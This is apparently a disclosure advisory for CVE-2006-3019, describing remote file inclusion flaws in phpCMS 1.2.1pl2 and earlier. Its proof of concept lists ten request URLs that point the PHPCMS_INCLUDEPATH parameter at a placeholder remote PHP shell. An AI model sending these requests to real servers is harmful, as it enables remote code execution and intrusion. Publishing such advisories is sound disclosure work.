DEFTCODE( 2 )

GPG - 2048R/6D378CAF

CVE-2006-3019 – phpCMS <= 1.2.1pl2 - Multiple Vulnerabilities

Vendor

phpCMS is more than just a content management system: it is also a templating engine and an application framework.

http://www.phpcms.de/

Description

Multiple PHP Remote File Inclusion (RFI) vulnerabilities in phpCMS 1.7 - 1.2.1pl2 (other versions may also be affected) allow remote attackers to execute arbitrary PHP code via a URL in the PHPCMS_INCLUDEPATH parameter.

Affected Files

Proof of Concept

~ stands for [php-shell-url]

  1. http://localhost/[pc_path]/parser/include/class.parser_phpcms.php?PHPCMS_INCLUDEPATH= ~
  2. http://localhost/[pc_path]/parser/include/class.session_phpcms.php?PHPCMS_INCLUDEPATH= ~
  3. http://localhost/[pc_path]/parser/include/class.edit_phpcms.php?PHPCMS_INCLUDEPATH= ~
  4. http://localhost/[pc_path]/parser/include/class.http_indexer_phpcms.php?PHPCMS_INCLUDEPATH= ~
  5. http://localhost/[pc_path]/parser/include/class.cache_phpcms.php?PHPCMS_INCLUDEPATH= ~
  6. http://localhost/[pc_path]/parser/include/class.search_phpcms.php?PHPCMS_INCLUDEPATH= ~
  7. http://localhost/[pc_path]/parser/include/class.lib_indexer_universal_phpcms.php?PHPCMS_INCLUDEPATH= ~
  8. http://localhost/[pc_path]/parser/include/class.layout_phpcms.php?PHPCMS_INCLUDEPATH= ~
  9. http://localhost/[pc_path]/parser/plugs/counter.php?PHPCMS_INCLUDEPATH= ~
  10. http://localhost/[pc_path]/parser/parser.php?PHPCMS_INCLUDEPATH= ~/

References